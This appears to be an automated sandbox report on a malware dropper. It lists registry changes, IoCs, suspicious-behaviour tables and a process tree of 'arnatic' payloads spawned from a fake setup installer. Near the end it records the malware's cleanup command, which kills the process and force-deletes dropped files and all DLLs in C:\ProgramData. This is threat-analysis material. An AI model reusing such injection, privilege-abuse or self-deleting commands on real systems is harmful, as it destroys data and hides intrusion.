Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b117224b1573d701
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "190"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{IY7880QH-GQ0R-SG6F-75Z5-PGQ2S76C3D6F}\650478DC7424C37C\2 = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGLockdown	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "47"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2c0397471573d701
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\Total = "937"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\DatastoreSchemaVersion = "8"
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 90dce8101673d701	MicrosoftEdge.exe

Script User-Agent 8 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	621	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	622	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	623	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	629	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	630	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	631	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	455	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	461	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

rUNdlL32.eXesvchost.exearnatic_2.exejfiag3g_gg.exearnatic_1.exe3081054.exe1126656.exe5925079.exe

pid	process
3172	rUNdlL32.eXe
3172	rUNdlL32.eXe
3900	svchost.exe
3900	svchost.exe
1252	arnatic_2.exe
1252	arnatic_2.exe
4732	jfiag3g_gg.exe
4732	jfiag3g_gg.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
3144	3081054.exe
3144	3081054.exe
2164	arnatic_1.exe
2164	arnatic_1.exe
3876	1126656.exe
3876	1126656.exe
4176	5925079.exe
4176	5925079.exe
3876	1126656.exe
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2756

Suspicious behavior: MapViewOfSection 64 IoCs

Processes:

arnatic_2.exeMrGh6bEH0L0a.exeexplorer.exeexplorer.exeexplorer.exe

pid	process
1252	arnatic_2.exe
5480	MrGh6bEH0L0a.exe
2756
2756
2756
2756
2756
2756
2756
2756
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756
2756
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756
2756
2928	explorer.exe
2928	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756
2756
5468	explorer.exe
5468	explorer.exe
2756
2756
5468	explorer.exe
5468	explorer.exe
5784	explorer.exe
5784	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
5468	explorer.exe
2756
2756
5468	explorer.exe
5468	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe
5784	explorer.exe

Suspicious behavior: SetClipboardViewer 2 IoCs

Processes:

5145379.exe8933555.exe

pid process

5244 5145379.exe
6516 8933555.exe

pid	process
5244	5145379.exe
6516	8933555.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

arnatic_5.exerUNdlL32.eXesvchost.exe1126656.exe5925079.exearnatic_7.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	1584	arnatic_5.exe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3900	svchost.exe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3172	rUNdlL32.eXe
Token: SeDebugPrivilege	3876	1126656.exe
Token: SeDebugPrivilege	4176	5925079.exe
Token: SeDebugPrivilege	208	arnatic_7.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe
Token: SeUndockPrivilege	2776	svchost.exe
Token: SeManageVolumePrivilege	2776	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2776	svchost.exe
Token: SeIncreaseQuotaPrivilege	2776	svchost.exe
Token: SeSecurityPrivilege	2776	svchost.exe
Token: SeTakeOwnershipPrivilege	2776	svchost.exe
Token: SeLoadDriverPrivilege	2776	svchost.exe
Token: SeSystemtimePrivilege	2776	svchost.exe
Token: SeBackupPrivilege	2776	svchost.exe
Token: SeRestorePrivilege	2776	svchost.exe
Token: SeShutdownPrivilege	2776	svchost.exe
Token: SeSystemEnvironmentPrivilege	2776	svchost.exe

Suspicious use of FindShellTrayWindow 33 IoCs

Processes:

chrome.exeirecord.tmpSetup3310.tmpprolab.tmpultramediaburner.tmpSetup3310.tmpSetup3310.tmpSetup3310.tmplibravpn_setup.tmpLibraVPN.exe

pid	process
2756
2756
8	chrome.exe
8	chrome.exe
2756
2756
2756
2756
2756
2756
2756
2756
5492	irecord.tmp
6780	Setup3310.tmp
2756
2756
7556	prolab.tmp
7504	ultramediaburner.tmp
744	Setup3310.tmp
7748	Setup3310.tmp
8196	Setup3310.tmp
5168	libravpn_setup.tmp
6796	LibraVPN.exe
2756
2756
2756
2756
2756
2756
2756
2756
2756
2756

Suspicious use of SendNotifyMessage 4 IoCs

Processes:

LibraVPN.exe

pid process

2756
2756
2756
6796 LibraVPN.exe

Suspicious use of SetWindowsHookEx 28 IoCs

Processes:

Browzar.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeLibraVPN.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exe

pid	process
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
3876	Browzar.exe
2756
5444
6520	MicrosoftEdgeCP.exe
6520	MicrosoftEdgeCP.exe
8644	MicrosoftEdge.exe
6584	MicrosoftEdgeCP.exe
6584	MicrosoftEdgeCP.exe
6796	LibraVPN.exe
6796	LibraVPN.exe
8568	MicrosoftEdge.exe
6580	MicrosoftEdgeCP.exe
6580	MicrosoftEdgeCP.exe
5184	MicrosoftEdge.exe
9120	MicrosoftEdgeCP.exe
9120	MicrosoftEdgeCP.exe
9032	MicrosoftEdge.exe
2844	MicrosoftEdgeCP.exe
2844	MicrosoftEdgeCP.exe
3684	MicrosoftEdge.exe
5924	MicrosoftEdgeCP.exe
5924	MicrosoftEdgeCP.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

pid process

2756

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install - копия (20).exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exearnatic_7.exearnatic_4.exearnatic_3.exerUNdlL32.eXesvchost.exe

description	pid	process	target process
PID 3540 wrote to memory of 1580	3540	setup_x86_x64_install - копия (20).exe	setup_installer.exe
PID 3540 wrote to memory of 1580	3540	setup_x86_x64_install - копия (20).exe	setup_installer.exe
PID 3540 wrote to memory of 1580	3540	setup_x86_x64_install - копия (20).exe	setup_installer.exe
PID 1580 wrote to memory of 3672	1580	setup_installer.exe	setup_install.exe
PID 1580 wrote to memory of 3672	1580	setup_installer.exe	setup_install.exe
PID 1580 wrote to memory of 3672	1580	setup_installer.exe	setup_install.exe
PID 3672 wrote to memory of 1548	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 1548	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 1548	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 4068	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 4068	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 4068	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3104	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3104	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3104	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3004	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3004	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3004	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3092	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3092	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3092	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 2720	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 2720	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 2720	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3368	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3368	3672	setup_install.exe	cmd.exe
PID 3672 wrote to memory of 3368	3672	setup_install.exe	cmd.exe
PID 4068 wrote to memory of 1252	4068	cmd.exe	arnatic_2.exe
PID 4068 wrote to memory of 1252	4068	cmd.exe	arnatic_2.exe
PID 4068 wrote to memory of 1252	4068	cmd.exe	arnatic_2.exe
PID 3104 wrote to memory of 1128	3104	cmd.exe	arnatic_3.exe
PID 3104 wrote to memory of 1128	3104	cmd.exe	arnatic_3.exe
PID 3104 wrote to memory of 1128	3104	cmd.exe	arnatic_3.exe
PID 2720 wrote to memory of 3712	2720	cmd.exe	arnatic_6.exe
PID 2720 wrote to memory of 3712	2720	cmd.exe	arnatic_6.exe
PID 2720 wrote to memory of 3712	2720	cmd.exe	arnatic_6.exe
PID 1548 wrote to memory of 2164	1548	cmd.exe	arnatic_1.exe
PID 1548 wrote to memory of 2164	1548	cmd.exe	arnatic_1.exe
PID 1548 wrote to memory of 2164	1548	cmd.exe	arnatic_1.exe
PID 3092 wrote to memory of 1584	3092	cmd.exe	arnatic_5.exe
PID 3092 wrote to memory of 1584	3092	cmd.exe	arnatic_5.exe
PID 3004 wrote to memory of 3788	3004	cmd.exe	arnatic_4.exe
PID 3004 wrote to memory of 3788	3004	cmd.exe	arnatic_4.exe
PID 3004 wrote to memory of 3788	3004	cmd.exe	arnatic_4.exe
PID 3368 wrote to memory of 3804	3368	cmd.exe	arnatic_7.exe
PID 3368 wrote to memory of 3804	3368	cmd.exe	arnatic_7.exe
PID 3368 wrote to memory of 3804	3368	cmd.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3788 wrote to memory of 3144	3788	arnatic_4.exe	3081054.exe
PID 3788 wrote to memory of 3144	3788	arnatic_4.exe	3081054.exe
PID 3788 wrote to memory of 3144	3788	arnatic_4.exe	3081054.exe
PID 1128 wrote to memory of 3172	1128	arnatic_3.exe	rUNdlL32.eXe
PID 1128 wrote to memory of 3172	1128	arnatic_3.exe	rUNdlL32.eXe
PID 1128 wrote to memory of 3172	1128	arnatic_3.exe	rUNdlL32.eXe
PID 3172 wrote to memory of 3900	3172	rUNdlL32.eXe	svchost.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3804 wrote to memory of 208	3804	arnatic_7.exe	arnatic_7.exe
PID 3172 wrote to memory of 2672	3172	rUNdlL32.eXe	svchost.exe
PID 3900 wrote to memory of 3872	3900	svchost.exe	svchost.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1904

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1412

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:936

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
- Executes dropped EXE
PID:6744

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:4340

C:\Users\Admin\AppData\Roaming\rsrbfsf
C:\Users\Admin\AppData\Roaming\rsrbfsf
2⤵
- Checks SCSI registry key(s)
PID:5624

C:\Users\Admin\AppData\Roaming\wirbfsf
C:\Users\Admin\AppData\Roaming\wirbfsf
2⤵
PID:5084

C:\Users\Admin\AppData\Roaming\wirbfsf
C:\Users\Admin\AppData\Roaming\wirbfsf
3⤵
- Checks SCSI registry key(s)
PID:6464

C:\Users\Admin\AppData\Roaming\jdrbfsf
C:\Users\Admin\AppData\Roaming\jdrbfsf
2⤵
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
PID:8900

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:7756

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:4324

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:6912

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:8496

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:6744

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:8928

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:3772

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:5408

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:7348

C:\Users\Admin\AppData\Roaming\rsrbfsf
C:\Users\Admin\AppData\Roaming\rsrbfsf
2⤵
- Checks SCSI registry key(s)
PID:8436

C:\Users\Admin\AppData\Roaming\wirbfsf
C:\Users\Admin\AppData\Roaming\wirbfsf
2⤵
- Suspicious use of SetThreadContext
PID:8800

C:\Users\Admin\AppData\Roaming\wirbfsf
C:\Users\Admin\AppData\Roaming\wirbfsf
3⤵
- Checks SCSI registry key(s)
PID:5080

C:\Users\Admin\AppData\Roaming\jdrbfsf
C:\Users\Admin\AppData\Roaming\jdrbfsf
2⤵
- Checks SCSI registry key(s)
PID:3468

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:8004

C:\Windows\system32\rundll32.exe
C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\QRIvBFx\QRIvBFx.dll",QRIvBFx
2⤵
- Windows security modification
- Drops file in System32 directory
PID:8808

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:6268

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:7144

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:636

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:1932

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:8892

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:2076

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:7152

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:4916

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:2988

C:\Users\Admin\AppData\Roaming\rsrbfsf
C:\Users\Admin\AppData\Roaming\rsrbfsf
2⤵
PID:3596

C:\Users\Admin\AppData\Roaming\wirbfsf
C:\Users\Admin\AppData\Roaming\wirbfsf
2⤵
PID:4452

C:\Users\Admin\AppData\Roaming\jdrbfsf
C:\Users\Admin\AppData\Roaming\jdrbfsf
2⤵
PID:3444

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:5644

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:5792

C:\Users\Admin\AppData\Local\Temp\335C.exe
C:\Users\Admin\AppData\Local\Temp\335C.exe
2⤵
PID:5252

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:344

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (20).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1580

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC2647624\setup_install.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_1.exe
4⤵
- Suspicious use of WriteProcessMemory
PID:1548

C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exe
arnatic_1.exe
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:2164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im arnatic_1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC2647624\arnatic_1.exe" & del C:\ProgramData\*.dll & exit
6⤵
PID:4212

C:\Windows\SysWOW64\taskkill.exe
taskkill /im arnatic_1.exe /f
7⤵
- Kills process with taskkill
PID:4280

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
7⤵
- Delays execution with timeout.exe
PID:1236

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c arnatic_2.exe
4⤵
- Suspicious use of WriteProcessMemory
